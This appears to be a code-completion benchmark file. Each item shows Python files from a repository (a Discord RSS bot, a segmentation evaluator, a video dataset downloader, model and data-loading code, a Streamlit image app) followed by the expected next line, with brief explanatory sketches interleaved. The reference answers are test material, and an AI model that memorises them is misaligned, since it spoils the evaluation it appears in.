                matches_highlight.append({**match, "highlight": matched_highlight_text})
            response["matches"] = matches_highlight

        return response

    def __request__(self, text: str, title: str = None):
        return self.session.post(
            API_URI,
            headers={
**HEADERS,
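Editor's note: the pooled-session setup in Plagiator.__init__ above, as a standalone sketch (smaller pool sizes and a placeholder URL for illustration):

import requests

session = requests.Session()
adapter = requests.adapters.HTTPAdapter(pool_connections=100, pool_maxsize=100)
session.mount("https://", adapter)  # reuse connections for all https:// requests
resp = session.post("https://example.com/api", headers={"Accept": "*/*"}, data={"text": "..."})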
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: fmhy/bot

# Path: cogs/_config.py
TOKEN = os.getenv("TOKEN", None)
GUILD_ID = os.getenv("GUILD_ID", None)
OWNERS = os.getenv("OWNERS").split(",")
RSS_CHANNELS = os.getenv("RSS_CHANNEL_IDS", None)
FEEDS = os.getenv("RSS_FEED_URLS", None)
DB = os.getenv("db_uri")
OWNERS: list[str]
FEEDS: str
RSS_CHANNELS: str
TOKEN: str

# Path: cogs/_helpers.py
def fetch_feed():
    # Load the seen IDs from the file, or create an empty dictionary
    sent_articles = list(mycol.find().sort("_id", -1))
    for rss_feed_url in rss_feed_urls:
        # Parse the RSS feed
        feed = feedparser.parse(rss_feed_url)

        # Check if the feed was parsed successfully
        if feed.bozo:
            print(f"Error parsing RSS feed: {feed.bozo_exception}")
            print(f"{rss_feed_url}")
            continue

        last_entry = feed.entries[0]
        x = list(mycol.find({"link": last_entry.link}))
        # print(x)
        if len(x) == 0:
            article_title = last_entry.title
            article_link = last_entry.link
            mycol.insert_one({"link": last_entry.link})
            # print(f"New article: {article_title}")
            # print(f"Link: {article_link}")
            yield f"{EMOJI} | {article_title}\n\n{article_link}"
        # print(f"Parsing complete for {rss_feed_url}")

# Path: main.py
class Bot(commands.Bot):
    def __init__(self) -> None:
        self.start_time = datetime.datetime.now(datetime.UTC)
        intents = discord.Intents.all()
        super().__init__(
            command_prefix=commands.when_mentioned_or(prefix),
            intents=intents,
            help_command=help.HelpMenu(),
            case_insensitive=True,
        )
        self.session: aiohttp.ClientSession
        formatter.install("discord", "INFO")
        formatter.install("bot", "INFO")
        self.logger = logging.getLogger("discord")
        self.logger = logging.getLogger("bot")

    async def setup_hook(self):
        await self.load_extension("jishaku")
        await self.load_cogs()

    async def load_cogs(self):
        s = time.perf_counter()
        for file in os.listdir("cogs/"):
            if file.endswith(".py") and not file.startswith("_"):
                extension = f"cogs.{file[:-3]}"
                try:
                    await self.load_extension(extension)
                    self.logger.info(f"Loaded - {extension}")
                except Exception as e:
                    exception = f"{type(e).__name__}: {e}"
                    self.logger.exception(
                        f"Failed to load extension {extension}. - {exception}")
                    traceback.print_exc()
        elapsed = time.perf_counter() - s
        self.logger.info(f"Loaded all extensions - took {elapsed:.2f}s")

    async def is_owner(self, user: discord.abc.User):
        if user.id in OWNERS:
            return True

        # Else fall back to the original
        return await super().is_owner(user)

    async def on_ready(self) -> None:
        self.session = aiohttp.ClientSession(loop=self.loop)
        await self.change_presence(activity=discord.Game(name="Free Media Heck Yeah"))
        self.logger.info("Bot is ready!")

# Path: cogs/rss.py
from typing import TYPE_CHECKING

from discord.ext import commands, tasks

from cogs._config import rss_chan_ids
from cogs._helpers import fetch_feed
from main import Bot
from discord.channel import TextChannel

if TYPE_CHECKING:

class RSSFeeds(commands.Cog):
    """RSSFeeds commands"""

    def __init__(self, bot: Bot):
        self.bot = bot

    @commands.Cog.listener()
    async def on_ready(self):
        self.send_rss.start()

    async def cog_before_invoke(self, ctx):
        """Triggers typing indicator on Discord before every command."""
        await ctx.channel.typing()
        return

    @tasks.loop(seconds=300)
    async def send_rss(self):
for msg in fetch_feed():
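The reference line consumes a generator; the stub below (fetch_feed_stub and the sample article are invented for illustration) shows the same yield-per-article shape without discord or a live feed.
```
def fetch_feed_stub():
    # Yields one formatted message per unseen article, like fetch_feed above.
    for title, link in [("Post A", "https://example.com/a")]:
        yield f"{title}\n\n{link}"

for msg in fetch_feed_stub():
    print(msg)  # stand-in for await channel.send(msg)
```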
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: cvlab-yonsei/RankMixup # Path: calibrate/evaluation/evaluator.py class DatasetEvaluator(metaclass=ABCMeta): """ Base class for a dataset evaluator """ @abstractmethod def reset(self): """ Preparation for a new round of evaluation. Should be called before starting a round of evaluation. """ pass @abstractmethod def update(self): """ Update status given a mini-batch results """ pass def curr_score(self): """ Return curr score after last batch """ pass @abstractmethod def mean_score(self): """ Return mean score across all classes/samples """ pass def class_score(self): """ Return score for different classes """ pass @abstractmethod def num_samples(self): """ return the evaluated samples """ pass @abstractmethod def main_metric(self): "return the name of the main metric" pass # Path: calibrate/utils/constants.py EPS: float = 1e-10 # Path: calibrate/evaluation/segment_evaluator.py import logging import numpy as np import pandas as pd import wandb from terminaltables import AsciiTable from typing import List, Optional from .evaluator import DatasetEvaluator from calibrate.utils.constants import EPS logger = logging.getLogger(__name__) def intersect_and_union(pred_label, label, num_classes, ignore_index): mask = (label != ignore_index) pred_label = pred_label[mask] label = label[mask] intersect = pred_label[pred_label == label] area_intersect, _ = np.histogram( intersect, bins=np.arange(num_classes + 1) ) area_pred_label, _ = np.histogram( pred_label, bins=np.arange(num_classes + 1) ) area_label, _ = np.histogram( label, bins=np.arange(num_classes + 1) ) area_union = area_pred_label + area_label - area_intersect return area_intersect, area_union, area_pred_label, area_label class SegmentEvaluator(DatasetEvaluator): def __init__(self, classes: Optional[List[str]] = None, ignore_index: int = -1) -> None: super().__init__() self.classes = classes self.num_classes = len(self.classes) self.ignore_index = ignore_index def num_samples(self): return self.nsamples def reset(self): self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float) self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float) self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float) self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float) self.nsamples = 0 def main_metric(self): return "miou" def ignore_background(self, pred: np.ndarray, target: np.ndarray): pred = pred[:, 1:] if pred.shape[1] > 1 else pred target = target[:, 1:] if target.shape[1] > 1 else target return pred, target def update(self, pred: np.ndarray, target: np.ndarray): """Update all the metric from batch size prediction and target. Args: pred: predictions to be evaluated in one-hot formation y: ground truth. It should be one-hot format. 
""" assert pred.shape == target.shape, "pred and target should have same shapes" n = pred.shape[0] self.nsamples += n batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float) batch_area_union = np.zeros((self.num_classes, ), dtype=np.float) batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float) batch_area_target = np.zeros((self.num_classes, ), dtype=np.float) for i in range(n): area_inter, area_union, area_pred, area_target = ( intersect_and_union( pred[i], target[i], self.num_classes, self.ignore_index ) ) batch_area_inter += area_inter batch_area_union += area_union batch_area_pred += area_pred batch_area_target += area_target
iou = batch_area_inter[1:].sum() / (batch_area_union[1:].sum() + EPS)
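A self-contained numpy sketch of the histogram-based IoU the reference line computes: class 0 is treated as background and dropped via the [1:] slice, with a small epsilon guarding an empty union (the function name and toy arrays are invented).
```
import numpy as np

def foreground_iou(pred, target, num_classes, eps=1e-10):
    inter = pred[pred == target]
    area_inter, _ = np.histogram(inter, bins=np.arange(num_classes + 1))
    area_pred, _ = np.histogram(pred, bins=np.arange(num_classes + 1))
    area_target, _ = np.histogram(target, bins=np.arange(num_classes + 1))
    area_union = area_pred + area_target - area_inter
    # Background (class 0) excluded, matching batch_area_inter[1:] above.
    return area_inter[1:].sum() / (area_union[1:].sum() + eps)

print(foreground_iou(np.array([0, 1, 1, 2]), np.array([0, 1, 2, 2]), 3))  # ~0.5
```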
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: CaptainCook4D/downloader # Path: util.py def prepare_gopro_2d_output_directory(args, output_dir: Path): output_dir.mkdir(parents=True, exist_ok=True) data_directory = output_dir / Constants.CAPTAIN_COOK_4D data_directory.mkdir(parents=True, exist_ok=True) gopro_data_directory = data_directory / Constants.GOPRO gopro_data_directory.mkdir(parents=True, exist_ok=True) if args.resolution4K: resolution_4K_directory = gopro_data_directory / Constants.RESOLUTION_4K resolution_4K_directory.mkdir(parents=True, exist_ok=True) resolution_360p_directory = gopro_data_directory / Constants.RESOLUTION_360P resolution_360p_directory.mkdir(parents=True, exist_ok=True) return data_directory # Path: util.py class Constants: CAPTAIN_COOK_4D = "captain_cook_4d" GOPRO = "gopro" HOLOLENS = "hololens" GOPRO_RESOLUTION_4K = "gopro_4k" GOPRO_RESOLUTION_360P = "gopro_360p" DATA_2D = "data_2d" RESOLUTION_360P = "resolution_360p" RESOLUTION_4K = "resolution_4k" RAW = "raw" SYNC = "sync" SPATIAL = "spatial" PV = "pv" MC = "mc" AB_ZIP = "ab.zip" DEPTH_ZIP = "depth.zip" FRAMES_ZIP = "frames.zip" DEPTH_AHAT = "depth_ahat" DEPTH = "depth" AB = "ab" DEPTH_POSE = "depth_pose" PV_POSE = "pv_pose" SPATIAL_POSE = "spatial_pose" IMU = "imu" DEPTH_POSE_PKL = "depth_pose_pkl" PV_POSE_PKL = "pv_pose_pkl" SPATIAL_POSE_PKL = "spatial_pkl" IMU_MAGNETOMETER = "imu_magnetometer" IMU_GYROSCOPE = "imu_gyroscope" IMU_ACCELEROMETER = "imu_accelerometer" IMU_ACCELEROMETER_PKL = "imu_accelerometer_pkl" IMU_GYROSCOPE_PKL = "imu_gyroscope_pkl" IMU_MAGNETOMETER_PKL = "imu_magnetometer_pkl" IS_HOLOLENS_ENABLED = "is_hololens_enabled" IS_SPATIAL_ENABLED = "is_spatial_enabled" DATA_JSON = "data_json" HOLOLENS_DEVICE_INFO = "hololens_device_info" RECORDING_ID = "recording_id" METADATA = "metadata" DOWNLOAD_LINKS = "download_links" FILE_SIZES = "file_sizes" RECORDING = "recording" HOLOLENS_RAW_PV_FRAMES_ZIP = "hololens_raw_pv_frames_zip" HOLOLENS_RAW_DEPTH_AHAT_AB_ZIP = "hololens_raw_depth_ahat_ab_zip" HOLOLENS_RAW_DEPTH_AHAT_DEPTH_ZIP = "hololens_raw_depth_ahat_depth_zip" HOLOLENS_RAW_MC_PKL = "hololens_raw_mc_pkl" HOLOLENS_SYNC_PV_FRAMES_ZIP = "hololens_sync_pv_frames_zip" HOLOLENS_SYNC_DEPTH_AHAT_AB_ZIP = "hololens_sync_depth_ahat_ab_zip" HOLOLENS_SYNC_DEPTH_AHAT_DEPTH_ZIP = "hololens_sync_depth_ahat_depth_zip" HOLOLENS_SYNC_PV_VIDEO = "hololens_sync_pv_video" HOLOLENS_RAW_SPATIAL_PKL = "hololens_raw_spatial_pkl" HOLOLENS_RAW_IMU_MAGNETOMETER_PKL = "hololens_raw_imu_magnetometer_pkl" HOLOLENS_RAW_IMU_GYROSCOPE_PKL = "hololens_raw_imu_gyroscope_pkl" HOLOLENS_RAW_IMU_ACCELEROMETER_PKL = "hololens_raw_imu_accelerometer_pkl" HOLOLENS_SYNC_SPATIAL_PKL = "hololens_sync_spatial_pkl" HOLOLENS_SYNC_IMU_MAGNETOMETER_PKL = "hololens_sync_imu_magnetometer_pkl" HOLOLENS_SYNC_IMU_GYROSCOPE_PKL = "hololens_sync_imu_gyroscope_pkl" HOLOLENS_SYNC_IMU_ACCELEROMETER_PKL = "hololens_sync_imu_accelerometer_pkl" HOLOLENS_RAW_PV_POSE_PKL = "hololens_raw_pv_pose_pkl" HOLOLENS_SYNC_PV_POSE_PKL = "hololens_sync_pv_pose_pkl" HOLOLENS_RAW_DEPTH_POSE_PKL = "hololens_raw_depth_pose_pkl" HOLOLENS_SYNC_DEPTH_POSE_PKL = "hololens_sync_depth_pose_pkl" DURATION = "duration" # Path: util.py def download_data(download_url_links, download_file_paths): # ---- 
DON'T INCREASE MAX_WORKERS, ELSE DOWNLOAD WILL BE INTERRUPTED ---- with ThreadPoolExecutor(max_workers=3) as executor: results = list( tqdm( executor.map( download_url, zip(download_url_links, download_file_paths) ), total=len(download_url_links) ) ) return results # Path: download_gopro_data.py import argparse import json from pathlib import Path from util import prepare_gopro_2d_output_directory, Constants, download_data def process_download_gopro_data(download_args): # ---- Parse Download Links Json ---- with open("metadata/download_links.json", "r") as f: download_links = json.load(f) output_dir = Path(download_args.output_dir)
data_directory = prepare_gopro_2d_output_directory(download_args, output_dir)
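The download_data helper quoted above maps a small thread pool over zipped (url, path) tasks; the sketch below keeps that shape with a stub worker (the urls, paths and worker body are placeholders, tqdm omitted).
```
from concurrent.futures import ThreadPoolExecutor

def download_url(task):
    url, path = task  # each task is one (url, file_path) pair from zip()
    return f"{url} -> {path}"

urls = ["https://example.com/a.mp4", "https://example.com/b.mp4"]
paths = ["a.mp4", "b.mp4"]
with ThreadPoolExecutor(max_workers=3) as executor:  # keep workers low
    results = list(executor.map(download_url, zip(urls, paths)))
print(results)
```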
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: mjavadpur/Sadtalker_LongVideos # Path: src/audio2pose_models/cvae.py class CVAE(nn.Module): def __init__(self, cfg): super().__init__() encoder_layer_sizes = cfg.MODEL.CVAE.ENCODER_LAYER_SIZES decoder_layer_sizes = cfg.MODEL.CVAE.DECODER_LAYER_SIZES latent_size = cfg.MODEL.CVAE.LATENT_SIZE num_classes = cfg.DATASET.NUM_CLASSES audio_emb_in_size = cfg.MODEL.CVAE.AUDIO_EMB_IN_SIZE audio_emb_out_size = cfg.MODEL.CVAE.AUDIO_EMB_OUT_SIZE seq_len = cfg.MODEL.CVAE.SEQ_LEN self.latent_size = latent_size self.encoder = ENCODER(encoder_layer_sizes, latent_size, num_classes, audio_emb_in_size, audio_emb_out_size, seq_len) self.decoder = DECODER(decoder_layer_sizes, latent_size, num_classes, audio_emb_in_size, audio_emb_out_size, seq_len) def reparameterize(self, mu, logvar): std = torch.exp(0.5 * logvar) eps = torch.randn_like(std) return mu + eps * std def forward(self, batch): batch = self.encoder(batch) mu = batch['mu'] logvar = batch['logvar'] z = self.reparameterize(mu, logvar) batch['z'] = z return self.decoder(batch) def test(self, batch): ''' class_id = batch['class'] z = torch.randn([class_id.size(0), self.latent_size]).to(class_id.device) batch['z'] = z ''' return self.decoder(batch) # Path: src/audio2pose_models/discriminator.py class PoseSequenceDiscriminator(nn.Module): def __init__(self, cfg): super().__init__() self.cfg = cfg leaky = self.cfg.MODEL.DISCRIMINATOR.LEAKY_RELU self.seq = nn.Sequential( ConvNormRelu('1d', cfg.MODEL.DISCRIMINATOR.INPUT_CHANNELS, 256, downsample=True, leaky=leaky), # B, 256, 64 ConvNormRelu('1d', 256, 512, downsample=True, leaky=leaky), # B, 512, 32 ConvNormRelu('1d', 512, 1024, kernel_size=3, stride=1, padding=1, leaky=leaky), # B, 1024, 16 nn.Conv1d(1024, 1, kernel_size=3, stride=1, padding=1, bias=True) # B, 1, 16 ) def forward(self, x): x = x.reshape(x.size(0), x.size(1), -1).transpose(1, 2) x = self.seq(x) x = x.squeeze(1) return x # Path: src/audio2pose_models/audio_encoder.py class AudioEncoder(nn.Module): def __init__(self, wav2lip_checkpoint, device): super(AudioEncoder, self).__init__() self.audio_encoder = nn.Sequential( Conv2d(1, 32, kernel_size=3, stride=1, padding=1), Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1), Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(64, 128, kernel_size=3, stride=3, padding=1), Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1), Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True), Conv2d(256, 512, kernel_size=3, stride=1, padding=0), Conv2d(512, 512, kernel_size=1, stride=1, padding=0),) #### load the pre-trained audio_encoder, we do not need to load wav2lip model here. 
# wav2lip_state_dict = torch.load(wav2lip_checkpoint, map_location=torch.device(device))['state_dict'] # state_dict = self.audio_encoder.state_dict() # for k,v in wav2lip_state_dict.items(): # if 'audio_encoder' in k: # state_dict[k.replace('module.audio_encoder.', '')] = v # self.audio_encoder.load_state_dict(state_dict) def forward(self, audio_sequences): # audio_sequences = (B, T, 1, 80, 16) B = audio_sequences.size(0) audio_sequences = torch.cat([audio_sequences[:, i] for i in range(audio_sequences.size(1))], dim=0) audio_embedding = self.audio_encoder(audio_sequences) # B, 512, 1, 1 dim = audio_embedding.shape[1] audio_embedding = audio_embedding.reshape((B, -1, dim, 1, 1)) return audio_embedding.squeeze(-1).squeeze(-1) #B seq_len+1 512 # Path: src/audio2pose_models/audio2pose.py import torch from torch import nn from src.audio2pose_models.cvae import CVAE from src.audio2pose_models.discriminator import PoseSequenceDiscriminator from src.audio2pose_models.audio_encoder import AudioEncoder class Audio2Pose(nn.Module): def __init__(self, cfg, wav2lip_checkpoint, device='cuda'): super().__init__() self.cfg = cfg self.seq_len = cfg.MODEL.CVAE.SEQ_LEN self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE self.device = device self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device) self.audio_encoder.eval() for param in self.audio_encoder.parameters(): param.requires_grad = False self.netG = CVAE(cfg)
self.netD_motion = PoseSequenceDiscriminator(cfg)
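The CVAE quoted above relies on the reparameterization trick; here is that step in isolation as a standalone torch sketch.
```
import torch

def reparameterize(mu, logvar):
    # z = mu + eps * sigma with sigma = exp(0.5 * logvar), so sampling stays
    # differentiable w.r.t. mu and logvar (as in CVAE.reparameterize above).
    std = torch.exp(0.5 * logvar)
    eps = torch.randn_like(std)
    return mu + eps * std

print(reparameterize(torch.zeros(2, 4), torch.zeros(2, 4)).shape)
```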
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Angryrou/udao # Path: udao/data/containers/tabular_container.py class TabularContainer(BaseContainer): """Container for tabular data, stored in DataFrame format.""" data: pd.DataFrame def get(self, key: str) -> np.ndarray: return self.data.loc[key].values # type: ignore # Path: udao/data/iterators/base_iterator.py class UdaoIterator(BaseIterator[Tuple[UT, th.Tensor], UST], Generic[UT, UST]): """Base iterator for the Udao use case, where the iterator returns a FeatureInput object. It is expected to accept: - a TabularContainer representing the tabular features which can be set as variables by the user in the optimization pipeline - a TabularContainer representing the objectives FST: Type of the iterator output shape - in the Udao case, restricted to FeatureInputShape and its subclasses. FT: Type of the iterator output - in the Udao case, restricted to th.Tensor and its subclasses This results in a type Tuple[UT, th.Tensor] for the iterator output. Parameters ---------- keys : Sequence[str] Keys of the dataset, used for accessing all features tabular_features : TabularContainer Tabular features of the iterator objectives : TabularContainer Objectives of the iterator """ def __init__( self, keys: Sequence[str], tabular_features: TabularContainer, objectives: TabularContainer, ) -> None: super().__init__(keys) self.tabular_features = tabular_features self.objectives = objectives def get_tabular_features_container( self, feature_input: th.Tensor ) -> TabularContainer: indices = [ i for i, name in enumerate(self.shape.feature_names) if name in self.tabular_features.data.columns ] tabular_features = feature_input[:, indices] tabular_df = pd.DataFrame( tabular_features.cpu().numpy(), columns=self.tabular_features.data.columns ) return TabularContainer(tabular_df) # Path: udao/utils/interfaces.py class UdaoEmbedInput(Generic[T], UdaoInput): embedding_input: T def to(self, device: th.device) -> "UdaoEmbedInput": if hasattr(self.embedding_input, "to"): return UdaoEmbedInput( self.embedding_input.to(device), self.features.to(device) # type: ignore ) else: return UdaoEmbedInput( self.embedding_input, self.features.to(device) # type: ignore ) # Path: udao/utils/interfaces.py class UdaoEmbedItemShape(Generic[ST], UdaoItemShape): embedding_input_shape: ST # Path: udao/utils/interfaces.py class UdaoInput: features: th.Tensor def to(self, device: th.device) -> "UdaoInput": return UdaoInput(self.features.to(device)) # Path: udao/utils/interfaces.py class UdaoItemShape: feature_names: list[str] output_names: list[str] # Path: udao/data/tests/iterators/dummy_udao_iterator.py from typing import Sequence, Tuple from ....data.containers.tabular_container import TabularContainer from ....data.iterators.base_iterator import UdaoIterator from ....utils.interfaces import ( UdaoEmbedInput, UdaoEmbedItemShape, UdaoInput, UdaoItemShape, ) import torch as th class DummyUdaoIterator(UdaoIterator[UdaoInput, UdaoItemShape]): def __init__( self, keys: Sequence[str], tabular_features: TabularContainer, objectives: TabularContainer, ) -> None: super().__init__(keys, tabular_features=tabular_features, objectives=objectives) def _getitem(self, idx: int) -> Tuple[UdaoInput, th.Tensor]: key = self.keys[idx] 
return ( UdaoInput( th.tensor(self.tabular_features.get(key), dtype=self.tensors_dtype) ), th.tensor(self.objectives.get(key), dtype=self.tensors_dtype), ) @property def shape(self) -> UdaoItemShape: return UdaoItemShape( feature_names=list(self.tabular_features.data.columns), output_names=list(self.objectives.data.columns), ) @staticmethod def collate( items: Sequence[Tuple[UdaoInput, th.Tensor]] ) -> Tuple[UdaoInput, th.Tensor]: features = UdaoInput(th.vstack([item[0].features for item in items])) objectives = th.vstack([item[1] for item in items]) return features, objectives
class DummyUdaoEmbedIterator(UdaoIterator[UdaoEmbedInput, UdaoEmbedItemShape]):
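The collate staticmethod above batches items by vertically stacking per-item tensors; a minimal torch sketch of that pattern, with toy tensors standing in for the real features and objectives.
```
import torch as th

items = [(th.tensor([[1.0, 2.0]]), th.tensor([[0.5]])),
         (th.tensor([[3.0, 4.0]]), th.tensor([[0.7]]))]
# Stack per-item rows into one batch per field, as in DummyUdaoIterator.collate.
features = th.vstack([f for f, _ in items])
objectives = th.vstack([o for _, o in items])
print(features.shape, objectives.shape)  # torch.Size([2, 2]) torch.Size([2, 1])
```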
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: SnailForce/SIM-Net # Path: data/base_dataset.py class BaseDataset(data.Dataset, ABC): """This class is an abstract base class (ABC) for datasets. To create a subclass, you need to implement the following four functions: -- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt). -- <__len__>: return the size of dataset. -- <__getitem__>: get a data point. -- <modify_commandline_options>: (optionally) add dataset-specific options and set default options. """ def __init__(self, opt): """Initialize the class; save the options in the class Parameters: opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions """ self.opt = opt self.root = opt.dataroot @staticmethod def modify_commandline_options(parser, is_train): """Add new dataset-specific options, and rewrite default values for existing options. Parameters: parser -- original option parser is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options. Returns: the modified parser. """ return parser @abstractmethod def __len__(self): """Return the total number of images in the dataset.""" return 0 @abstractmethod def __getitem__(self, index): """Return a data point and its metadata information. Parameters: index - - a random integer for data indexing Returns: a dictionary of data with their names. It ususally contains the data itself and its metadata information. 
""" pass # Path: data/base_dataset.py def get_transform(opt, params=None, grayscale=False, method=Image.BICUBIC, convert=True): transform_list = [] if grayscale: transform_list.append(transforms.Grayscale(1)) if 'resize' in opt.preprocess: osize = [opt.load_size, opt.load_size] transform_list.append(transforms.Resize(osize, method)) elif 'scale_width' in opt.preprocess: transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, opt.crop_size, method))) if 'crop' in opt.preprocess: if params is None: transform_list.append(transforms.RandomCrop(opt.crop_size)) else: transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size))) if opt.preprocess == 'none': transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=4, method=method))) if not opt.no_flip: if params is None: transform_list.append(transforms.RandomHorizontalFlip()) elif params['flip']: transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip']))) if convert: transform_list += [transforms.ToTensor()] # if grayscale: # transform_list += [transforms.Normalize((0.5,), (0.5,))] # else: # transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))] return transforms.Compose(transform_list) # Path: data/image_folder.py def make_dataset_by_name(dir, max_dataset_size=float("inf")): images = [] assert os.path.isdir(dir), '%s is not a valid directory' % dir for root, _, fnames in sorted(os.walk(dir)): for fname in fnames: if is_image_file(fname): # path = os.path.join(root, fname) images.append(fname) return images[:min(max_dataset_size, len(images))] # Path: data/mask_dataset.py import os,yaml import torch.nn.functional as F import random import numpy as np import collections import torch from data.base_dataset import BaseDataset, get_transform from data.image_folder import make_dataset_by_name from PIL import Image,ImageFilter class MaskDataset(BaseDataset): def __init__(self, opt): """Initialize this dataset class. Parameters: opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions """ BaseDataset.__init__(self, opt) self.root_dir = os.path.join(opt.dataroot,'class') self.phase = opt.phase self.img_mask_dict = {} self.img_names = {} self.data_size = {} self.label_list = os.listdir(os.path.join(self.root_dir)) # The shape of the human face is more complex, so increase the training ratio if "face" in self.label_list: self.label_list.append("face") for label in self.label_list: label_dir = os.path.join(self.root_dir,label,"images") with open(os.path.join(self.root_dir,label,'list.yaml')) as f: self.img_mask_dict[label] = yaml.safe_load(f) self.img_names[label] = list(self.img_mask_dict[label].keys()) self.data_size[label] = len(self.img_names[label])
self.transform = get_transform(self.opt)
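get_transform above assembles a torchvision pipeline conditionally; below is a trimmed sketch of that build-a-list-then-Compose pattern, reduced to two of the options (a minimal subset for illustration, not the full behavior).
```
from torchvision import transforms

def build_transform(grayscale=False, load_size=256):
    tlist = []
    if grayscale:
        tlist.append(transforms.Grayscale(1))
    tlist.append(transforms.Resize([load_size, load_size]))
    tlist.append(transforms.ToTensor())
    return transforms.Compose(tlist)

print(build_transform(grayscale=True))
```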
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: adarshsankarrs/PhotoshopApp # Path: multiapp.py class MultiApp: """Framework for combining multiple streamlit applications. """ def __init__(self): self.apps = [] def add_app(self, title, func): """Adds a new application. """ self.apps.append({ "title": title, "function": func }) def run(self): # app = st.sidebar.radio( app = st.sidebar.selectbox( 'Select from the options', self.apps, format_func=lambda app: app['title']) app['function']() # Path: apps/home.py def app(): # Path: apps/sketch.py DEMO_IMAGE = 'imgs/Tiger.jpg' def app(): def img2sketch(photo, k_size): # Path: apps/inpaint.py def app(): def inpaintt(img,mask): DEMO_IMAGE = 'imgs/impai.png' DEMO_IMAGE_MASK = 'imgs/maskn.png' # Path: apps/stadap.py def app(): def adap(img): DEMO_IMAGE = 'imgs/scannedimg.jpeg' # Path: apps/textonimg.py DEMO_IMAGE = 'imgs/Tiger.jpg' def app(): def imgtext(photo, text): # Path: apps/Edge_Cont.py def app(): def load_image(filename): def photo(): DEMO_IMAGE = 'imgs/Tiger.jpg' # Path: apps/Face_detect.py def app(): def face_detection(): DEMO_IMAGE = 'imgs/Person.jpg' # Path: apps/Crop.py def app(): # Path: apps/filters.py def app(): def load_image(): def img2bright(photo): def img2enh(photo): def img2inv(photo): def gamma_function1(channel, gamma): def img2sum(photo): def gamma_function2(channel, gamma): def img2win(photo): def img2sepia(photo): def hsv(img, l, u): def img2splash(photo): def img2cont(photo): def img2emb(photo): def tv_60(photo): def img2cartoon(photo): def img2sketch(photo, k_size): def exponential_function(channel, exp): def img2tone(img, number): def img2day(photo): def img2pen(photo): def comic(photo): DEMO_IMAGE = 'imgs/Tiger.jpg' SP_DEMO_IMAGE = 'imgs/ball.jpg' SP_IMAGE = 'imgs/Splash.jpg' # Path: apps/abtus.py def app(): # Path: apps/Feature_detect.py DEMO_IMAGE = 'imgs/Person.jpg' def app(): def load_image(): def feature_detection(): # Path: app.py import streamlit as st import numpy as np import pandas as pd import cv2 from PIL import Image, ImageOps from multiapp import MultiApp from apps import home,sketch,inpaint,stadap,textonimg,Edge_Cont,Face_detect,Crop,filters,abtus,Feature_detect app = MultiApp() # option = st.selectbox( # 'Select from the options', # ('Home', 'Filters', 'Doc scanner','add text'), key = 1) # if(option=='Filters'): # opt = st.selectbox( # 'Select from the options', # ('sepia', 'Filter1', 'filter2','filter3'), key = 2) # Add all your application here app.add_app("Home", home.app) app.add_app("Add filters to image", filters.app) app.add_app("Sketch", sketch.app) app.add_app("Image inpainting", inpaint.app) app.add_app("Doc Scanner", stadap.app) app.add_app("Add Title to image", textonimg.app) app.add_app("Crop an Image", Crop.app) app.add_app("Edge and Contour detection ", Edge_Cont.app)
app.add_app("Face detection", Face_detect.app)
